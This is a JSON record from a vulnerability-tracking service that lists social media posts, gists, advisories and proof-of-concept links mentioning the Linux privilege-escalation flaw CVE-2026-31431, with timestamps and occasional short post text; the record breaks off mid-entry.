{"vulnerability": "CVE-2026-31431", "sightings": [{"uuid": "b5eec51b-e292-4568-b9df-725f183c4f97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/bykvaadm/7a9e56861ea25de49980ebb0660d7e56", "content": "", "creation_timestamp": "2026-04-30T10:17:49.000000Z"}, {"uuid": "f4d0d85e-8fc4-4b3e-b73a-75ef9c711464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3mkpjfqzn7h2z", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\n\nDiscussion", "creation_timestamp": "2026-04-30T11:34:05.946110Z"}, {"uuid": "5e0f33ae-8780-4562-ae23-efe0e6736c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/116493321164201535", "content": "En las \u00faltimas 24 horas se han detectado vulnerabilidades cr\u00edticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantaci\u00f3n de autenticaci\u00f3n, robo de tokens y ejecuci\u00f3n remota de c\u00f3digo; adem\u00e1s, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores cient\u00edficos. Descubre estos y m\u00e1s detalles en el siguiente listado de noticias sobre seguridad inform\u00e1tica:\n\ud83d\uddde\ufe0f \u00daLTIMAS NOTICIAS EN SEGURIDAD INFORM\u00c1TICA \ud83d\udd12====| \ud83d\udd25 LO QUE DEBES SABER HOY \ufeff\ufeff30/04/26\ufeff\ufeff  \ud83d\udcc6 |==== \n\ud83d\udd12 COPY FAIL \u2014 732 BYTES TO ROOT\nSe ha descubierto una vulnerabilidad cr\u00edtica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre m\u00e1s sobre esta vulnerabilidad y su impacto aqu\u00ed \ud83d\udc49 https://djar.co/3ckGrI\n\ud83c\udf10 LA INTERNET EST\u00c1 CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)\nUna falla de suplantaci\u00f3n de autenticaci\u00f3n ha sido identificada en cPanel y WHM, dos herramientas clave para la gesti\u00f3n de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticaci\u00f3n. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Inf\u00f3rmate sobre c\u00f3mo proteger tus sistemas aqu\u00ed \ud83d\udc49 https://djar.co/ScQtAV\n\ud83d\udd17 VULNERABILIDAD EN EL ROUTER DE SOLANA\nImportantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades cr\u00edticas podr\u00edan comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aqu\u00ed \ud83d\udc49 https://djar.co/2clAA\n\ud83d\udcc4 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD\nAdobe ha revelado tres vulnerabilidades cr\u00edticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecuci\u00f3n remota de c\u00f3digo y la filtraci\u00f3n de informaci\u00f3n mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la \u00faltima versi\u00f3n es fundamental para evitar intrusiones y p\u00e9rdidas de datos. Conoce los detalles y actualizaciones disponibles aqu\u00ed \ud83d\udc49 https://djar.co/Rvvu5\n\ud83c\udfdb\ufe0f LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA\nEl Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a p\u00e1ginas ajenas en procesos contra la pirater\u00eda, buscando un equilibrio entre la protecci\u00f3n de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital m\u00e1s seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aqu\u00ed \ud83d\udc49 https://djar.co/8dbV\n\u2601\ufe0f VULNERABILIDADES CR\u00cdTICAS EN LA IMPLEMENTACI\u00d3N DE CLOUDFLARE\nSe han reportado vulnerabilidades en los proxies de autorizaci\u00f3n y archivos PAC alojados por Cloudflare que afectan la gesti\u00f3n de pol\u00edticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque t\u00e9cnicas, representan un avance en c\u00f3mo se protegen las redes y requieren atenci\u00f3n para evitar posibles explotaciones. Mantente informado sobre c\u00f3mo estas vulnerabilidades impactan la seguridad del entorno web aqu\u00ed \ud83d\udc49 https://djar.co/Y6uR\n\ud83d\udc1b DETECTANDO LA AMENAZA DEL MALWARE FAST16\nUn malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulaci\u00f3n de programas matem\u00e1ticos y simulaciones f\u00edsicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores cient\u00edficos y tecnol\u00f3gicos sensibles. La detecci\u00f3n y respuesta temprana son claves para mitigar el da\u00f1o. Aprende c\u00f3mo proteger tus sistemas frente a Fast16 aqu\u00ed \ud83d\udc49 https://djar.co/CN8X", "creation_timestamp": "2026-04-30T11:03:37.280116Z"}, {"uuid": "01af72ac-0b9d-45e3-9e0b-9727306c902d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Atirut.toot.community.ap.brid.gy/post/3mkpfck6l6a22", "content": "CVE-2026-31431 is one mean fucker ngl", "creation_timestamp": "2026-04-30T10:20:44.027095Z"}, {"uuid": "978943e1-f5bb-44aa-8625-60285c2509e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/nicomen/261af7bfd7c0fb45710c2399b1196241", "content": "", "creation_timestamp": "2026-04-30T11:27:56.000000Z"}, {"uuid": "0ae33e1b-e7c1-4e31-b2c7-79b23b6571d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/antarcticrainforest/5170ed0e6de737c35507c13184a480e8", "content": "", "creation_timestamp": "2026-04-30T11:21:26.000000Z"}, {"uuid": "dd2aac17-3ae3-486c-be12-5e22305d1a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3mknpjajyr624", "content": "Copy Fail \u2013 CVE-2026-31431\n\nDiscussion", "creation_timestamp": "2026-04-29T18:18:05.707613Z"}, {"uuid": "1b171109-f0c5-402a-8e21-40a3bca79328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/morfie/28f7413a683b51df42e719e645a98e8b", "content": "", "creation_timestamp": "2026-04-30T11:19:59.000000Z"}, {"uuid": "60dfb15a-4557-44ad-b2a7-02afe99366f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mknpo6uevi27", "content": "Copy Fail \u2013 CVE-2026-31431\nDiscussion | hackernews | Author: unsnap_biceps", "creation_timestamp": "2026-04-29T18:20:51.260347Z"}, {"uuid": "56c85862-c226-46d7-8a10-5779094a4613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-009-vulnerability-affecting-linux-cve-2026-31431", "content": "", "creation_timestamp": "2026-04-30T11:15:29.000000Z"}, {"uuid": "ae6d711e-3be0-453d-b2db-5643cdaaf2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/t2saras.bsky.social/post/3mkqgkl2ym22g", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T20:15:45.650642Z"}, {"uuid": "4d9d9d98-a09d-4552-95d9-e9738ab20e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/samicrusader/b24950322bd8997484f7255b8a909795", "content": "", "creation_timestamp": "2026-04-29T21:29:08.000000Z"}, {"uuid": "23470e0e-d0b3-40fe-984d-03e253bd7093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jcrabapple.dmv.community.ap.brid.gy/post/3mkpkfhass522", "content": "Copy Fail \u2014 CVE-2026-31431\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-30T11:51:52.836263Z"}, {"uuid": "591aae93-8501-4f23-abd7-6938b310d09c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/maximsmol/ceb98dfce166937ddb844ce17ed795d4", "content": "", "creation_timestamp": "2026-04-30T21:25:32.000000Z"}, {"uuid": "aefe1c19-837d-4204-a149-919be3cabe7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/hrioslima/733e1771694e99033fb619ad39e649b8", "content": "", "creation_timestamp": "2026-05-01T01:21:43.000000Z"}, {"uuid": "ead1b7b5-7fc8-431f-9007-ef4b17dfc362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/n.gotosocial.tourmentine.com.ap.brid.gy/post/3mko2k2qjpml2", "content": "[lien] Copy Fail \u2014 CVE-2026-31431 #security #gik #cli #py", "creation_timestamp": "2026-04-29T21:35:24.031961Z"}, {"uuid": "076538fb-d17f-4af9-9305-61030d220133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ajuvo.chaos.social.ap.brid.gy/post/3mko3yssybvl2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-29T22:01:58.581591Z"}, {"uuid": "02f529db-0584-4baa-9002-d9fb16a1a947", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ricardobranco777/6d70f06588aa0c2a0b99a9005fb2209a", "content": "", "creation_timestamp": "2026-04-29T21:42:05.000000Z"}, {"uuid": "10f8a069-d504-49ec-99ac-b598782f840f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/frichinic/c4f10080bfa8a8fd1ec5ed349277ab42", "content": "", "creation_timestamp": "2026-04-30T20:59:06.000000Z"}, {"uuid": "d648747b-7b0a-4ab0-8370-6776701ac8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/hrioslima/efc467849ce5e148b592b2da2a35a647", "content": "", "creation_timestamp": "2026-05-01T01:30:22.000000Z"}, {"uuid": "8b10f40e-716c-4d20-8a2e-264cd683c4c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mknptyzvq32o", "content": "Copy Fail \u2013 CVE-2026-31431\nL: https://copy.fail/\nC: https://news.ycombinator.com/item?id=47952181\nposted on 2026.04.29 at 14:13:53 (c=0, p=4)", "creation_timestamp": "2026-04-29T18:24:06.490928Z"}, {"uuid": "4ba88ca6-96d3-4144-a4c2-1435ffb471b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sambowne.infosec.exchange.ap.brid.gy/post/3mko356r3yn42", "content": "Copy Fail \u2014 CVE-2026-31431 Linux Privilege Escalation https://copy.fail/", "creation_timestamp": "2026-04-29T21:46:17.962316Z"}, {"uuid": "84b5bb8f-8148-4dd5-ae9c-b8c96877d889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/MagnaCapax/0cfe2a4d9259c833f9f2a3d700678ddf", "content": "", "creation_timestamp": "2026-04-30T12:52:06.000000Z"}, {"uuid": "a8dd777d-4a9c-4318-b927-cb8d74f8d420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.acn.gov.it/portale/w/linux-disponibile-poc-per-lo-sfruttamento-della-cve-2026-31431", "content": "", "creation_timestamp": "2026-04-30T08:12:39.000000Z"}, {"uuid": "45018df4-776e-4e5c-a82c-2fadc4a73991", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn300.e-work.xyz/post/3mko4ksgsah2r", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T22:11:36.530898Z"}, {"uuid": "c998e233-a6c9-4af6-a2dc-ec17d8a592f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news.bsky.social/post/3mko6tgwvxa2n", "content": "Copy Fail - CVE-2026-31431 [Discussion]", "creation_timestamp": "2026-04-29T22:52:13.665819Z"}, {"uuid": "64d5df8b-6ff3-4fee-acfa-7e5e94407a6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn.rbrt.fr/post/3mko47xu26m2y", "content": "Copy Fail \u2013 CVE-2026-31431\nhttps://copy.fail/\nhttps://news.ycombinator.com/item?id=47952181", "creation_timestamp": "2026-04-29T22:05:33.369979Z"}, {"uuid": "775b62ba-d903-43fc-bffa-f01b395da03b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkob6kz6pz2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T23:34:14.297234Z"}, {"uuid": "e6832dbb-b33d-4416-a659-e3106995e718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464da", "content": "", "creation_timestamp": "2026-04-29T22:53:05.000000Z"}, {"uuid": "1073138f-9065-4573-815f-e88d513a10a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/predkambrij/85da17fa4235e4dc7305873d5df5af39", "content": "", "creation_timestamp": "2026-04-30T13:31:03.000000Z"}, {"uuid": "1900ed3e-104c-443e-a69c-be758a319af4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/daknhh/67f9b55c189844ba11e5eb0f71a8cbd8", "content": "", "creation_timestamp": "2026-04-30T13:14:40.000000Z"}, {"uuid": "93da8575-dc4e-4d5b-ab51-ab56794406c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mknqafs7g225", "content": "Copy Fail \u2013 CVE-2026-31431\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T18:31:02.609932Z"}, {"uuid": "e58a05ce-8b75-4cdc-8c37-f16df4374e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/foobar.eagleusb.com/post/3mkoewntqnc24", "content": "argh, *kernel local escalation: CVE-2026-31431\n\n> exploit-intel.com/vuln/CVE-202...", "creation_timestamp": "2026-04-30T00:41:25.440832Z"}, {"uuid": "b724d4a0-4bfb-47ec-9c31-a488756ff0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkobhkegnd2j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T23:39:15.754389Z"}, {"uuid": "c7877ba4-027b-4bf0-b4b3-83987b3d834f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/grenkoca/d8257be909e5073e9d6f4cf20c9273c7", "content": "", "creation_timestamp": "2026-04-29T23:46:53.000000Z"}, {"uuid": "258a891a-1afd-4db8-bfd1-1cceb00a9905", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/yht/56b48ad379122730a2c0b89eb0efcbf3", "content": "", "creation_timestamp": "2026-04-30T01:39:57.000000Z"}, {"uuid": "44da0607-32ef-4c41-8ef9-1950df99062f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkojc3mpjj2i", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T01:59:22.451077Z"}, {"uuid": "a8ec01b8-252b-4761-a780-f05d09c1a44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc500.bsky.social/post/3mkof22fbvl2l", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-30T00:43:17.585430Z"}, {"uuid": "22699305-a674-48c6-a6e8-1a303b7bb672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kdmsnr.com/post/3mkogd7ykbx2a", "content": "\ud83c\udf10\u30b3\u30d4\u30fc\u5931\u6557 \u2013 CVE-2026-31431\nhttps://copy.fail/\nvia #HackerNews", "creation_timestamp": "2026-04-30T01:06:19.358574Z"}, {"uuid": "c40f34f4-5494-43a9-8ae2-2af742869dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nillpo.bsky.social/post/3mkoinsi5bc2d", "content": "\u3048\u30fc\n\"Copy Fail \u2013 CVE-2026-31431 | Hacker News\"\nnews.ycombinator.com/item?id=4795...", "creation_timestamp": "2026-04-30T01:48:01.878748Z"}, {"uuid": "d2830805-40b8-4345-80da-fba7b7c99cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3mkojdpb4un2s", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/\n\n\ncomments  #copy.fail", "creation_timestamp": "2026-04-30T02:00:16.235645Z"}, {"uuid": "d6a67928-5009-4e5f-9e3f-dec4e3f07b38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkokotmfiw2u", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T02:24:24.005961Z"}, {"uuid": "d1896df9-592a-43bd-b4cb-0f4bab170933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nillpo.bsky.social/post/3mkoiogkxlc2d", "content": "\"Copy Fail \u2014 CVE-2026-31431\"\ncopy.fail", "creation_timestamp": "2026-04-30T01:48:24.446317Z"}, {"uuid": "f6fcca34-7e45-4547-977d-b2485d1e9d4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mknqm356q2l2", "content": "So CopyFail CVE-2026-31431 is a thing.", "creation_timestamp": "2026-04-29T18:37:44.845463Z"}, {"uuid": "b15e840f-045f-4d85-ace1-3a56d68ae1b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkokxsswvn2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T02:29:26.423636Z"}, {"uuid": "5d6e7b37-7166-48dd-8526-67fbcb45a674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/richardevs/7dd9677bb9d7164af5f1d90f39047ea6", "content": "", "creation_timestamp": "2026-04-30T02:34:19.000000Z"}, {"uuid": "c7d2dba3-8d26-4953-a1d9-7392d32cfcdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Nyaasu66/638c072379b54a5d5e9a57cb5fbef073", "content": "", "creation_timestamp": "2026-04-30T02:44:38.000000Z"}, {"uuid": "945930f4-a336-405f-85c7-c024e3c2c560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116489443704631952", "content": "So CopyFail CVE-2026-31431 is a thing.", "creation_timestamp": "2026-04-29T18:37:31.129965Z"}, {"uuid": "00ff3292-ccc4-4184-95b8-b798e41f207e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/LionNatsu/f1d557ade3332923c2319df9799d1b5e", "content": "", "creation_timestamp": "2026-04-30T03:54:26.000000Z"}, {"uuid": "dfd3915e-4282-4ca8-828b-217d097041df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/cr0nx/3079c57310f01ad89699bda642e0e37e", "content": "", "creation_timestamp": "2026-04-30T04:05:17.000000Z"}, {"uuid": "ddf88edd-3715-44fe-8084-9b4d31e6cc92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py", "content": "", "creation_timestamp": "2026-04-30T05:28:48.129836Z"}, {"uuid": "ef50cc3c-b962-4e26-8c27-8c551d5e81d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/22701e2f-15d4-44db-9df9-7e7cdb26d102", "content": "", "creation_timestamp": "2026-04-30T15:40:35.427683Z"}, {"uuid": "9d8eac62-bfee-4b7d-9219-b62b255b452d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkowpljpqj2h", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T05:59:35.594045Z"}, {"uuid": "8a311bd2-a792-4cd5-b5a2-c2bfed87e53a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ridwan-muhamad/74df4a2d89a4e6c51cc180101950c79c", "content": "", "creation_timestamp": "2026-04-30T05:26:21.000000Z"}, {"uuid": "d191a61b-c863-419e-bf00-f9fef0e47c54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/antarcticrainforest/aa784d8f9cd8b0cc25a277cce595d450", "content": "", "creation_timestamp": "2026-04-30T06:43:27.000000Z"}, {"uuid": "7814c4d2-793f-4b4c-bc38-1fc85945d733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": 